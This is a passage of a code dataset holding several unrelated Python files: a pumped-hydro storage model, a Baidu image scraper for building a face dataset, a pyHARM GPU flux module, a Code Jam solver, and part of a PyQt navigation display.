0.0,0.0,0.0,0.0,0.0\n else:\n Water_Flow_Rate_Gen = (PHES_Cap + 2)/1.84 #566.337 #((m^3/s) )\n Water_Flow_Rate_Pump = Water_Flow_Rate_Gen*0.76 #430.4 #((m^3/s)) \n \n #Operation Thresholds for Running Average\n Pumping_Threshold = 5 #%\n Generating_Threshold = 5 #% \n \n #Constants for Equations\n Water_Density = 1000 #kg/m^3\n Gen_Efficiency = 0.75\n G = 9.8 #gravity (m/s^2)\n \n #Water Level Boundaries\n PHES_Water_Lvl_Min = 285.9 # m\n PHES_Water_Lvl_Max = 305 # m\n #PHES_Water_Lvl_Max = PHES_Cap/(Water_Density*Water_Flow_Rate_Gen*G*Gen_Efficiency/1000000) + 50# m\n \n #Hydraulic Head\n Hydraulic_Head = Water_Lvl - 54.84\n\n #Generating Capacity\n Max_Gen = Water_Density*Water_Flow_Rate_Gen*G*Hydraulic_Head*Gen_Efficiency/1000000 #(MW)\n \n #Pumping Capacity\n Max_Pump = Water_Density*Water_Flow_Rate_Pump*G*Hydraulic_Head/1000000 #(MW)\n \n #Check if there is a surplus in renewables\n Surplus_Check = 0\n Surplus_Amount = Renew_Gen - Renew_Dispatched\n if( Surplus_Amount > 0):\n Surplus_Check = 1 #There is a surplus of renewable generation\n \n #Running Average\n alpha = 0.13\n New_Average = alpha*Demand + (1-alpha)*Running_Average #Calculate new running average\n \n #Check if pumping or generating thresholds are exceeded\n Gen_Check = 0\n Pump_Check = 0\n if((Demand/New_Average)>(1+Generating_Threshold/100)):\n Gen_Check = 1 #Generating threshold exceeded\n elif((Demand/New_Average)<(1-Pumping_Threshold/100)):\n Pump_Check = 1 #Pumping threshold exceeded\n \n #Check if NG will be fully dispatched\n NG_Check = 0\n if((Grid_Demand_Left - NG_Gen) > 0):\n NG_Check = 1\n \n #Initialize Outputs\n New_State = PHES_State;\n MW_To_Be_Gen = 0;\n MW_To_Be_Pump = 0;\n New_Water_Level = Water_Lvl;\n \n \n #ADD water to res storage from any rainfalland and calculate new water level \n #TBD\n \n #Check if we should generate\n if((Surplus_Check == 0) and ((Gen_Check == 1) or (NG_Check == 1))): #There is still demand left and either demand is peaking or NG doesn't satisfy remaining demand\n if(Water_Lvl > PHES_Water_Lvl_Min): #+ 1 as a buffer temporarily\n \n if(NG_Check == 1): #If NG doesn't meet grid demand\n MW_To_Be_Gen = np.minimum(Max_Gen, Grid_Demand_Left - NG_Gen) \n else :\n MW_To_Be_Gen = np.minimum(Max_Gen, Grid_Demand_Left) #Not 100% sure here\n \n time = 3600\n \n for x in range(0,3600): #Generate for 1 hour (3600 seconds)\n temp = GenOneSecond(New_Water_Level, MW_To_Be_Gen)\n if(temp == 0):\n time = x\n break\n New_Water_Level = temp\n \n MW_To_Be_Gen = time/3600 * MW_To_Be_Gen \n \n New_State = 2 #Generating\n \n return New_State, MW_To_Be_Gen, MW_To_Be_Pump, New_Water_Level, New_Average\n \n \n #Check if we should pump\n if((Surplus_Check == 1) or (Pump_Check == 1)): #Either a surplus of renewables or demand is very low\n if(Water_Lvl < PHES_Water_Lvl_Max): #- 1 as a buffer temporarily\n \n if(Surplus_Check == 1): #IF there is a renewable surplus, pump up the surplus\n MW_To_Be_Pump = np.minimum(Max_Pump, Surplus_Amount)\n \n elif(NG_Gen - Grid_Demand_Left > 0): #No renewable surplus, but NG gen is not fully used\n MW_To_Be_Pump = np.minimum(Max_Pump, NG_Gen - Grid_Demand_Left)\n \n else: #Just in case demand is very low but expensive generation is dispatched due to portfolio makeup\n New_State = 0 #Standby\n return New_State, MW_To_Be_Gen, MW_To_Be_Pump, New_Water_Level, New_Average\n \n time = 3600\n \n for x in range(0,3600): #Pump for 1 hour (3600 seconds)\n temp = PumpOneSecond(New_Water_Level, MW_To_Be_Pump)\n if(temp == 0):\n time = x\n break\n New_Water_Level = temp\n\n MW_To_Be_Pump = time/3600 * MW_To_Be_Pump \n \n New_State = 1 #Pumping\n return New_State, MW_To_Be_Gen, MW_To_Be_Pump, New_Water_Level, New_Average\n\n #All pumping and generating conditions failed\n New_State = 0 #Standby\n return New_State, MW_To_Be_Gen, MW_To_Be_Pump, New_Water_Level, New_Average\n\n\n#Equations calculated from northfield data and created using https://www.mycurvefit.com/\n#Excel is terrible at best fit equations and messed it up\n#But i did graph the new equations in excel to double check the website is correct\n\ndef PumpOneSecond(Water_Level, Energy_To_Pump):\n if(Water_Level >= 304.95):\n return 0\n \n Head = Water_Level - 54.864 #m\n Water_Density = 1000 #kg/m^3\n G = 9.8 #gravity (m/s^2)\n Volume_In_Res = getVolumeStored(Water_Level)\n \n Flow_Rate = (Energy_To_Pump*1000000)/(Water_Density*G*Head) #(m^3/s)\n\n New_Volume = Volume_In_Res + Flow_Rate\n New_Water_Level = getWaterLevel(New_Volume)\n \n return New_Water_Level\n \ndef GenOneSecond(Water_Level, Energy_To_Gen):\n if(Water_Level <= 285.9):\n return 0\n \n Head = Water_Level - 54.864 #m\n Water_Density = 1000 #kg/m^3\n Gen_Efficiency = 0.75\n G = 9.8 #gravity (m/s^2)\n Volume_In_Res = getVolumeStored(Water_Level)\n \n Flow_Rate = (Energy_To_Gen*1000000)/(Water_Density*G*Head*Gen_Efficiency) #(m^3/s)\n\n New_Volume = Volume_In_Res - Flow_Rate\n New_Water_Level = getWaterLevel(New_Volume)\n \n return New_Water_Level\n\n\n#x = (10 (sqrt(1744599 y + 5318406157000) + 47560900))/1744599\ndef getWaterLevel(Storage): #Takes in volume stored (m^3) in reservoir as an arg\n return 10*(((1744599*Storage+5318406157000)**0.5)+ 47560900)/1744599 #Outputs water level in m\n \n#y = 1293547000 - 9512180*x + 17445.99*x^2\ndef getVolumeStored(WaterLevel): #Takes in the water level (m) of reservoir as an arg\n return (17445.99*((WaterLevel)*(WaterLevel)) - 9512180*(WaterLevel) + 1293547000) #Outputs volume of water stored in m^3\n\n","sub_path":"OldVersions/PHES_model11617.py","file_name":"PHES_model11617.py","file_ext":"py","file_size_in_byte":8660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"438260145","text":"#This code can only download images from baidu\r\n#\r\n\r\nimport urllib\r\nimport requests\r\nimport os\r\nimport re\r\n\r\nimport numpy as np\r\n\r\n\r\nstr_table = {\r\n '_z2C$q': ':',\r\n '_z&e3B': '.',\r\n 'AzdH3F': '/'\r\n}\r\n\r\nchar_table = {\r\n 'w': 'a',\r\n 'k': 'b',\r\n 'v': 'c',\r\n '1': 'd',\r\n 'j': 'e',\r\n 'u': 'f',\r\n '2': 'g',\r\n 'i': 'h',\r\n 't': 'i',\r\n '3': 'j',\r\n 'h': 'k',\r\n 's': 'l',\r\n '4': 'm',\r\n 'g': 'n',\r\n '5': 'o',\r\n 'r': 'p',\r\n 'q': 'q',\r\n '6': 'r',\r\n 'f': 's',\r\n 'p': 't',\r\n '7': 'u',\r\n 'e': 'v',\r\n 'o': 'w',\r\n '8': '1',\r\n 'd': '2',\r\n 'n': '3',\r\n '9': '4',\r\n 'c': '5',\r\n 'm': '6',\r\n '0': '7',\r\n 'b': '8',\r\n 'l': '9',\r\n 'a': '0'\r\n}\r\n\r\n# str 的translate方法需要用单个字符的十进制unicode编码作为key\r\n# value 中的数字会被当成十进制unicode编码转换成字符\r\n# 也可以直接用字符串作为value\r\nchar_table = {ord(key): ord(value) for key, value in char_table.items()}\r\n\r\n# 解码图片URL\r\ndef decode(url):\r\n # 先替换字符串\r\n for key, value in str_table.items():\r\n url = url.replace(key, value)\r\n # 再替换剩下的字符\r\n return url.translate(char_table)\r\n\r\n# 生成网址列表\r\ndef buildUrls(word):\r\n word = urllib.parse.quote(word)\r\n url = r\"http://image.baidu.com/search/acjson?tn=resultjson_com&ipn=rj&ct=201326592&fp=result&queryWord={word}&cl=2&lm=-1&ie=utf-8&oe=utf-8&st=-1&ic=0&word={word}&face=0&istype=2nc=1&pn={pn}&rn=60\"\r\n #urls = (url.format(word=word, pn=x) for x in itertools.count(start=0, step=60))\r\n urls = (url.format(word=word, pn=x) for x in range (0,360,60)) #设定图片下载数量\r\n return urls\r\n\r\n# 解析JSON获取图片URL\r\nre_url = re.compile(r'\"objURL\":\"(.*?)\"')\r\ndef resolveImgUrl(html):\r\n imgUrls = [decode(x) for x in re_url.findall(html)]\r\n return imgUrls\r\n\r\ndef downImg(imgUrl, dirpath, imgName):\r\n filename = os.path.join(dirpath, imgName)\r\n #string_1 = save_path + \"/\" + spelling_name + \"/\" + spelling_name +'_'+str(i) + '.jpg' \r\n try:\r\n res = requests.get(imgUrl, timeout=15)\r\n if str(res.status_code)[0] == \"4\":\r\n print(str(res.status_code), \":\" , imgUrl)\r\n return False\r\n except Exception as e:\r\n print(\"抛出异常:\", imgUrl)\r\n print(e)\r\n return False\r\n with open(filename, \"wb\") as f:\r\n f.write(res.content)\r\n return True\r\n\r\n\r\n#def mkDir(dirName):\r\n# dirpath = os.path.join(sys.path[0], dirName)\r\n# if not os.path.exists(dirpath):\r\n# os.mkdir(dirpath)\r\n# return dirpath\r\n\r\ndef mkdir(file_name,save_path): \r\n save_path = save_path.strip() \r\n # 判断路径是否存在 \r\n isExists = os.path.exists(file_name) \r\n if not isExists: \r\n print( u'新建了名字叫做',file_name,u'的文件夹' ) \r\n # 创建目录操作函数 \r\n os.makedirs(save_path + \"/\" +file_name) \r\n return True \r\n else: \r\n # 如果目录存在则不创建,并提示目录已经存在 17型手枪\r\n print( u'名为',file_name,u'的文件夹已经创建成功' ) \r\n return False \r\n\r\n\r\ndef read_txt(txt_path):\r\n names = []\r\n with open(txt_path,\"r\") as f:\r\n for line in f.readlines()[0:]:\r\n pair = line.strip().split()\r\n names.append(pair)\r\n return np.array(names)\r\n\r\n\r\nif __name__ == '__main__':\r\n txt_path = \"D:/X/facenet/Generate_AFDB/new_name3.txt\"\r\n names = read_txt(txt_path)\r\n print(\"成功读取TXT文件\")\r\n save_path = \"D:/X/facenet/Generate_AFDB/AFDB\"\r\n print(\"下载文件保存路径为:\" + save_path)\r\n print(\"=\" * 50)\r\n j = 0\r\n for k in range (len(names)):\r\n word = names[k,0]\r\n mkdir(names[k,1],save_path) \r\n # dirpath = mkDir(\"results\")\r\n urls = buildUrls(word)\r\n index = 0\r\n \r\n \r\n for url in urls:\r\n print(\"正在请求:\", url)\r\n try:\r\n \r\n html = requests.get(url, timeout=20).content.decode('utf-8')\r\n imgUrls = resolveImgUrl(html)\r\n if len(imgUrls) == 0: # 没有图片则结束\r\n break\r\n dirpath = save_path + \"/\" + names[j,1]\r\n for url in imgUrls:\r\n if downImg(url, dirpath, str(index) + \".jpg\"):\r\n index += 1\r\n print(\"已下载 %s 张\" % index)\r\n except:\r\n continue \r\n j=j+1\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n #http://lovenight.github.io/2015/11/15/Python-3-%E5%A4%9A%E7%BA%BF%E7%A8%8B%E4%B8%8B%E8%BD%BD%E7%99%BE%E5%BA%A6%E5%9B%BE%E7%89%87%E6%90%9C%E7%B4%A2%E7%BB%93%E6%9E%9C/\r\n","sub_path":"Setup_dataset/Download_picture.py","file_name":"Download_picture.py","file_ext":"py","file_size_in_byte":5424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"71793100","text":"# FLUXES\n\nimport numpy as np\n\nimport pyopencl.array as cl_array\nimport pyopencl.clmath as clm\n\nimport loopy as lp\nfrom loopy.version import LOOPY_USE_LANGUAGE_VERSION_2018_2\nfrom pyHARM.loopy_tools import *\n\nfrom pyHARM.defs import Loci\nfrom pyHARM.phys import get_state, prim_to_flux, mhd_vchar\nfrom pyHARM.reconstruction import reconstruct\n\nfrom pyHARM.debug_tools import plot_var, plot_prims\n\n# If there's a better way to do statics than globals, I'm all ears\nknl_flux_ct_emf = None; knl_flux_ct = None\nknl_addfluxes = None; knl_ctop = None\n\nemf1 = None; emf2 = None; emf3 = None\nPl = None; Pr = None\nUl = None; Ur = None\nfluxL = None; fluxR = None\n\nknl_ndt = None\nndt = None\ndef ndt_min(params, G, ctop):\n sh = G.shapes\n\n global knl_ndt\n if knl_ndt is None:\n # Note that ghost zones are already added where necessary!\n # ndt is kept bulk only as this is all that's needed/makes sense\n code = \"\"\"\n ndt[i,j,k] = 1 / ( 1/(cour * dx[1] / ctop[1,i+ng,j+ng,k+ng]) +\n 1/(cour * dx[2] / ctop[2,i+ng,j+ng,k+ng]) +\n 1/(cour * dx[3] / ctop[3,i+ng,j+ng,k+ng]) )\n \"\"\"\n knl_ndt = lp.make_kernel(sh.isl_grid_scalar, code,\n [*vecArrayArgs(\"ctop\"), ...])\n knl_ndt = lp.fix_parameters(knl_ndt, cour=params['cour'])\n knl_ndt = lp.fix_parameters(knl_ndt, ndim=4)\n knl_ndt = tune_grid_kernel(knl_ndt, sh.bulk_scalar, ng=G.NG)\n print(\"Compiled ndt min\")\n\n global ndt\n if ndt is None:\n ndt = cl_array.zeros(params['queue'], sh.bulk_scalar, dtype=np.float64)\n\n # TODO if debug print/record argmin?\n evt, _ = knl_ndt(params['queue'], ctop=ctop, dx=G.dx_d, ndt=ndt)\n\n # TODO manual reduce this? Loopy doesn't like reductions...\n return cl_array.min(ndt)\n\n\nctop = None\ndef get_flux(params, G, P):\n sh = G.shapes\n\n # Just need 4 elements -- filled below\n F = [0] * 4\n\n global Pl, Pr, ctop\n if Pl is None:\n Pl = cl_array.empty(params['queue'], sh.grid_primitives, dtype=np.float64)\n Pr = cl_array.empty(params['queue'], sh.grid_primitives, dtype=np.float64)\n ctop = cl_array.empty(params['queue'], sh.grid_vector, dtype=np.float64)\n\n # reconstruct left- and right-going components\n reconstruct(params, G, P, 1, lout=Pl, rout=Pr)\n # turn these into a net flux\n F[1], ctop[1] = lr_to_flux(params, G, Pl, Pr, 1, Loci.FACE1)\n\n reconstruct(params, G, P, 2, lout=Pl, rout=Pr)\n F[2], ctop[2] = lr_to_flux(params, G, Pl, Pr, 2, Loci.FACE2)\n\n reconstruct(params, G, P, 3, lout=Pl, rout=Pr)\n F[3], ctop[3] = lr_to_flux(params, G, Pl, Pr, 3, Loci.FACE3)\n\n if params['dt_static']:\n ndt = params['dt_start']\n else:\n ndt = ndt_min(params, G, ctop)\n\n return F, ndt\n\n\n# Note that the sense of L/R flips from zone to interface during function call\nDl = None; Dr = None\ndef lr_to_flux(params, G, Pr, Pl, dir, loc):\n s = G.slices\n sh = G.shapes\n\n # These return dicts of clArrays\n global Dl, Dr\n if Dl is None:\n Dl = get_state(params, G, Pl, loc)\n Dr = get_state(params, G, Pr, loc)\n else:\n get_state(params, G, Pl, loc, out=Dl)\n get_state(params, G, Pr, loc, out=Dr)\n\n cmaxL, cminL = mhd_vchar(params, G, Pl, Dl, loc, dir)\n cmaxR, cminR = mhd_vchar(params, G, Pr, Dr, loc, dir)\n\n global knl_ctop\n if knl_ctop is None:\n code = add_ghosts(\"\"\"\n <> cmax = if( cmaxL[i,j,k] > cmaxR[i,j,k], cmaxL[i,j,k], cmaxR[i,j,k])\n <> cmin = if(-cminL[i,j,k] > -cminR[i,j,k], -cminL[i,j,k], -cminR[i,j,k])\n cmax0 := if(0. > cmax, 0., cmax)\n cmin0 := if(0. > cmin, 0., cmin)\n ctop[i,j,k] = if(cmax0 > cmin0, cmax0, cmin0)\n \"\"\")\n knl_ctop = lp.make_kernel(sh.isl_grid_scalar, code,\n [*scalarArrayArgs(\"ctop\", \"cmaxL\", \"cmaxR\", \"cminL\", \"cminR\"), ...],\n assumptions=sh.assume_grid, default_offset=lp.auto,\n silenced_warnings='inferred_iname')\n # for var in [\"cmax\", \"cmin\", \"cmax0\", \"cmin0\"]:\n # knl_ctop = lp.assignment_to_subst(knl_ctop, var)\n knl_ctop = tune_grid_kernel(knl_ctop, sh.halo1_primitives, ng=G.NG-1)\n print(\"Compiled ctop\")\n\n ctop = cl_array.empty_like(cmaxL)\n evt, _ = knl_ctop(params['queue'], cmaxL=cmaxL, cmaxR=cmaxR, cminL=cminL, cminR=cminR, ctop=ctop)\n evt.wait()\n del cmaxL, cmaxR, cminL, cminR\n\n if 'debug' in params and params['debug']:\n # This is slow as it's host-bound\n if np.any(np.isnan((1/ctop).get()[s.bulkrh1])):\n raise ValueError(\"Ctop is 0 or NaN at {}\".format(np.argwhere(np.isnan(ctop.get()[s.bulkrh1]))[0]))\n\n global Ul, Ur, fluxL, fluxR\n if Ul is None:\n Ul = cl_array.empty(params['queue'], sh.grid_primitives, dtype=np.float64)\n Ur = cl_array.empty(params['queue'], sh.grid_primitives, dtype=np.float64)\n fluxL = cl_array.empty(params['queue'], sh.grid_primitives, dtype=np.float64)\n fluxR = cl_array.empty(params['queue'], sh.grid_primitives, dtype=np.float64)\n\n prim_to_flux(params, G, Pl, Dl, 0, loc, out=Ul)\n prim_to_flux(params, G, Pr, Dr, 0, loc, out=Ur)\n\n prim_to_flux(params, G, Pl, Dl, dir, loc, out=fluxL)\n prim_to_flux(params, G, Pr, Dr, dir, loc, out=fluxR)\n\n flux = cl_array.empty(params['queue'], sh.grid_primitives, dtype=np.float64)\n global knl_addfluxes\n if knl_addfluxes is None:\n code = add_ghosts(\"\"\"\n flux[p,i,j,k] = 0.5 * (fluxL[p,i,j,k] + fluxR[p,i,j,k] - ctop[i,j,k] * (Ur[p,i,j,k] - Ul[p,i,j,k]))\n \"\"\")\n knl_addfluxes = lp.make_kernel(sh.isl_grid_primitives, code,\n [*primsArrayArgs(\"flux\", \"fluxL\", \"fluxR\", \"Ul\", \"Ur\"),\n *scalarArrayArgs(\"ctop\"), ...],\n assumptions=sh.assume_grid,\n default_offset=lp.auto)\n knl_addfluxes = tune_prims_kernel(knl_addfluxes, sh.halo1_primitives, ng=G.NG-1)\n print(\"Compiled addfluxes\")\n\n evt, _ = knl_addfluxes(params['queue'], flux=flux, fluxL=fluxL, fluxR=fluxR, ctop=ctop, Ur=Ur, Ul=Ul)\n if params['profile']:\n evt.wait()\n\n return flux, ctop\n\n\ndef flux_ct(params, G, F):\n sh = G.shapes\n\n global knl_flux_ct, knl_flux_ct_emf\n global emf1, emf2, emf3\n if knl_flux_ct is None:\n # Flux constrained transport from Toth 2000\n # Implementation adapted from Ben Ryan's ebhlight code\n # TODO can use locals here if careful\n code_emf = replace_prim_names(add_ghosts(\"\"\"\n emf3[i, j, k] = 0.25*(F1[B2, i, j, k] + F1[B2, i, j - 1, k] \\\n - F2[B1, i, j, k] - F2[B1, i - 1, j, k])\n emf2[i, j, k] = -0.25*(F1[B3, i, j, k] + F1[B3, i, j, k - 1] \\\n - F3[B1, i, j, k] - F3[B1, i - 1, j, k])\n emf1[i, j, k] = 0.25*(F2[B3, i, j, k] + F2[B3, i, j, k - 1] \\\n - F3[B2, i, j, k] - F3[B2, i, j - 1, k])\n \"\"\"))\n code_flux = replace_prim_names(add_ghosts(\"\"\"\n F1[B1, i, j, k] = 0\n F1[B2, i, j, k] = 0.5 * (emf3[i, j, k] + emf3[i, j + 1, k])\n F1[B3, i, j, k] = -0.5 * (emf2[i, j, k] + emf2[i, j, k + 1])\n \n F2[B1, i, j, k] = -0.5 * (emf3[i, j, k] + emf3[i + 1, j, k])\n F2[B2, i, j, k] = 0\n F2[B3, i, j, k] = 0.5 * (emf1[i, j, k] + emf1[i, j, k + 1])\n \n F3[B1, i, j, k] = 0.5 * (emf2[i, j, k] + emf2[i + 1, j, k])\n F3[B2, i, j, k] = -0.5 * (emf1[i, j, k] + emf1[i, j + 1, k])\n F3[B3, i, j, k] = 0\n \"\"\"))\n\n knl_flux_ct_emf = lp.make_kernel(sh.isl_grid_primitives, code_emf,\n [*primsArrayArgs(\"F1\", \"F2\", \"F3\"),\n *scalarArrayArgs(\"emf1\", \"emf2\", \"emf3\"), ...],\n assumptions=sh.assume_grid)\n knl_flux_ct_emf = tune_prims_kernel(knl_flux_ct_emf, sh.halo1_primitives, ng=G.NG-1)\n\n knl_flux_ct = lp.make_kernel(sh.isl_grid_primitives, code_flux,\n [*primsArrayArgs(\"F1\", \"F2\", \"F3\"),\n *scalarArrayArgs(\"emf1\", \"emf2\", \"emf3\"), ...],\n assumptions=sh.assume_grid)\n knl_flux_ct = tune_prims_kernel(knl_flux_ct, sh.halo1_primitives, ng=G.NG-1)\n\n #knl_flux_ct = lp.set_options(knl_flux_ct, \"print_cl\")\n #print(knl_flux_ct)\n print(\"Compiled flux_ct\")\n\n emf1 = cl_array.empty(params['queue'], sh.grid_scalar, dtype=np.float64)\n emf2 = cl_array.empty(params['queue'], sh.grid_scalar, dtype=np.float64)\n emf3 = cl_array.empty(params['queue'], sh.grid_scalar, dtype=np.float64)\n\n # The queue is in-order for the foreseeable future. When it's not, we'll need a .wait() in here\n evt, _ = knl_flux_ct_emf(params['queue'], F1=F[1], F2=F[2], F3=F[3], emf1=emf1, emf2=emf2, emf3=emf3)\n evt, _ = knl_flux_ct(params['queue'], F1=F[1], F2=F[2], F3=F[3], emf1=emf1, emf2=emf2, emf3=emf3)\n\n # Similarly, we might care about whether everything's up-to-date when we relinquish control\n return F\n","sub_path":"pyHARM/fluxes.py","file_name":"fluxes.py","file_ext":"py","file_size_in_byte":9246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"241562675","text":"import numpy as np\nfrom itertools import permutations\n\nfin = open('ain.txt', 'r')\nfout = open('aout.txt', 'w')\n\nT = int(fin.readline())\n\ndef valid(i):\n if len(i) == 1:\n return True\n x = []\n for j in range(len(i) // 2):\n if i[2*j] == i[2*j+1]:\n return False\n if i[2*j] == \"R\" and i[2*j+1] == \"P\":\n x += [\"P\"]\n elif i[2*j] == \"R\" and i[2*j+1] == \"S\":\n x += [\"R\"]\n elif i[2*j] == \"P\" and i[2*j+1] == \"R\":\n x += [\"P\"]\n elif i[2*j] == \"P\" and i[2*j+1] == \"S\":\n x += [\"S\"]\n elif i[2*j] == \"S\" and i[2*j+1] == \"R\":\n x += [\"R\"]\n elif i[2*j] == \"S\" and i[2*j+1] == \"P\":\n x += [\"S\"]\n return valid(x)\n\n\ndef solve():\n N, R, P, S = tuple([int(i) for i in fin.readline().split()])\n \n x = permutations(\"P\"*P + \"R\"*R + \"S\"*S)\n for i in x:\n if valid(list(i)):\n return ''.join(i)\n\n return \"IMPOSSIBLE\"\n\nfor i in range(T):\n fout.write(\"Case #\" + str(i+1) + \": \" + str(solve()) + \"\\n\")\n\nfin.close()\nfout.close()\n","sub_path":"codes/CodeJamCrawler/16_4_1_neat/16_4_1_raynboz_a.py","file_name":"16_4_1_raynboz_a.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"79221705","text":"from PyQt5 import QtWidgets\r\nfrom PyQt5.QtGui import QPainter, QColor, QPen, QBrush, QTransform, QFont, QFontMetrics\r\nfrom PyQt5.QtCore import Qt, QPointF\r\nfrom PyQt5 import QtGui\r\nimport numpy as np\r\nfrom constantParameters import *\r\nfrom navigationDisplay import *\r\n\r\n\r\n# Waypoints width\r\nWP_WIDTH = 2.5\r\nWP_DP = WP_WIDTH/2.\r\nTP_WIDTH = 10\r\nTP_DP = TP_WIDTH/2.\r\nASW = 2 # ASW stands for Arc Semi Width\r\n\r\n# Aicraft width\r\nAC_WIDTH = 10\r\n\r\n# Colors\r\nwhite = QColor(255, 255, 255)\r\ngreen = QColor(0, 255, 0)\r\n\r\n# Pens\r\nP_PEN = QPen(green, WP_DP)\r\nP_PEN.setCosmetic(True)\r\nTRAJ_PEN = QPen(green, ASW)\r\nTRAJ_PEN.setCosmetic(True)\r\nLEG_PEN = QPen(QColor(\"lightgrey\"), ASW)\r\nLEG_PEN.setCosmetic(True)\r\nROSE_PEN = QPen(white,ASW)\r\nROSE_PEN.setCosmetic(True)\r\nAC_PEN = QPen(QColor(255, 255, 0))\r\nAC_PEN.setCosmetic(True)\r\n\r\n# Brushes\r\nTP_BRUSH = QBrush(QColor(\"grey\"))\r\nWP_BRUSH = QBrush(QColor(\"red\"))\r\nAC_BRUSH = QBrush(QColor(\"white\")) # for the aicraft\r\n\r\n# Coefficient multiplicateur pour les arc. Un cercle complet = 360*16\r\nSP_ANGLE_COEFF = 16\r\n\r\n# ROSE\r\nLARGE_GRAD_LONG = 20\r\nTEXT_SIZE = 10\r\n\r\n# to get rid of integers and floats distinction in QGraphicsItem\r\nPRECISION_FACTOR = 100\r\n\r\n\r\ndef resize(x):\r\n return x*PRECISION_FACTOR\r\n\r\n\r\nclass QGraphicsArcItem(QtWidgets.QGraphicsEllipseItem):\r\n \"\"\"Classe graphique qui affiche un arc de cercle,\r\n comme portion du cercle commençant à start_angle et finissant à\r\n start_angle + span_angle\"\"\"\r\n def __init__(self, start, centre, alpha, turnRadius, det, parent):\r\n self.det = det # déterminant entre les deux segments de la transition\r\n self.set_XY(centre, turnRadius)\r\n self.w, self.h = resize(turnRadius*2), resize(turnRadius*2)\r\n super().__init__(self.x, self.y, self.w, self.h, parent)\r\n self.set_span_angle(alpha)\r\n self.start_angle = self.set_start_angle(start, centre)\r\n\r\n def paint(self, painter=QPainter(), style=None, widget=None):\r\n painter.setPen(TRAJ_PEN)\r\n if self.det < 0:\r\n painter.drawArc(self.x, self.y, self.w, self.h, self.start_angle, self.span_angle)\r\n else:\r\n painter.drawArc(self.x, self.y, self.w, self.h, self.start_angle, -self.span_angle)\r\n\r\n def set_span_angle(self, alpha):\r\n self.span_angle = alpha * SP_ANGLE_COEFF\r\n\r\n def set_start_angle(self, start, centre):\r\n if start.x - centre.x == 0:\r\n if self.det > 0:\r\n beta = -90\r\n else:\r\n beta = 90\r\n return beta * SP_ANGLE_COEFF\r\n else:\r\n beta = np.arctan((start.y - centre.y) / (start.x - centre.x)) * RAD2DEG\r\n if start.x < centre.x:\r\n return -(180 + beta) * SP_ANGLE_COEFF\r\n else:\r\n return -beta * SP_ANGLE_COEFF\r\n\r\n def set_XY(self, centre, turnRadius):\r\n self.x = resize(centre.x - turnRadius)\r\n self.y = resize(centre.y - turnRadius)\r\n\r\n\r\nclass QGraphicsWayPointsItem(QtWidgets.QGraphicsRectItem):\r\n \"\"\"Affichage des legs\"\"\"\r\n\r\n def __init__(self, x, y, parent, name, view, current_hdg, zoom):\r\n self.x, self.y = resize(x), resize(y)\r\n super().__init__(self.x, self.y, resize(WP_WIDTH), resize(WP_WIDTH), parent)\r\n self.pen = P_PEN\r\n self.name = name\r\n self.view = view\r\n self.current_hdg = current_hdg\r\n self.parent = parent\r\n self.moveBy(-resize(WP_DP), -resize(WP_DP))\r\n self.textitem = QtWidgets.QGraphicsTextItem(self.parent)\r\n self.description()\r\n\r\n def description(self):\r\n \"\"\"Affichage de l'ID des waypoints\"\"\"\r\n font = QFont()\r\n font_metric = QFontMetrics(font)\r\n text_width = font_metric.width(self.name)\r\n font.setWeight(resize(500 * TEXT_SIZE))\r\n self.textitem.setPos(self.x + resize(WP_WIDTH), self.y + resize(WP_WIDTH))\r\n self.textitem.setPlainText(self.name)\r\n self.textitem.setFont(font)\r\n self.textitem.setScale(10)\r\n self.textitem.setRotation(self.current_hdg)\r\n self.textitem.setDefaultTextColor(green)\r\n self.textitem.setTransform(self.view.transform())\r\n\r\n\r\nclass QGraphicsTransitionPoints(QtWidgets.QGraphicsRectItem):\r\n def __init__(self, x, y, parent):\r\n super().__init__(x, y, TP_WIDTH, TP_WIDTH, parent)\r\n self.x, self.y = resize(x), resize(y)\r\n self.paint(QPainter())\r\n\r\n def paint(self, painter, style=None, widget=None):\r\n painter.setPen(P_PEN)\r\n painter.setBrush(TP_BRUSH)\r\n # copie la transformation due au zoom\r\n t = painter.transform()\r\n m11, m22 = t.m11(), t.m22()\r\n\r\n # fixer les coefficients de translation horizontale m11 et verticale m22 à 1\r\n painter.setTransform(QTransform(1, t.m12(), t.m13(), t.m21(), 1, t.m23(), t.m31(), t.m32(), t.m33()))\r\n\r\n painter.translate(-TP_DP, -TP_DP) # translater de -TP_DP pour s'affranchir de l'épaisseur de l'item\r\n painter.drawRect(self.x * m11, self.y * m22, TP_WIDTH, TP_WIDTH)\r\n painter.restore()\r\n\r\n\r\nclass QGraphicsImaginaryPoints(QtWidgets.QGraphicsRectItem):\r\n \"\"\"Points utiles à la détermination de la transition, pas affichés sur le ND\"\"\"\r\n def __init__(self, x, y, parent):\r\n super().__init__(x, y, TP_WIDTH, TP_WIDTH, parent)\r\n self.x, self.y = resize(x), resize(y)\r\n\r\n\r\nclass QGraphicsLegsItem(QtWidgets.QGraphicsLineItem):\r\n \"\"\"Affichage des legs\"\"\"\r\n def __init__(self, x1, y1, x2, y2, parent):\r\n super().__init__(resize(x1), resize(y1), resize(x2), resize(y2), parent)\r\n self.pen = LEG_PEN\r\n\r\n\r\nclass AircraftItem(QtWidgets.QGraphicsItemGroup):\r\n \"\"\"The view of an aircraft in the GraphicsScene\"\"\"\r\n\r\n def __init__(self):\r\n \"\"\"AircraftItem constructor, creates the ellipse and the pixmap impage and adds to the scene\r\n Ici, l'aircraft est défini par une image pixmap (pour avoir une forme d'avion) mais aussi par une ellipse située\r\n sous cette image car les ellipses sont plus faciles à manipuler\"\"\"\r\n super().__init__(None)\r\n self.item2 = QtWidgets.QGraphicsEllipseItem()\r\n image = QtGui.QImage('plane4.png')\r\n self.pixmap = QtGui.QPixmap.fromImage(image)\r\n self.item = QtWidgets.QGraphicsPixmapItem(QtGui.QPixmap.fromImage(image))\r\n 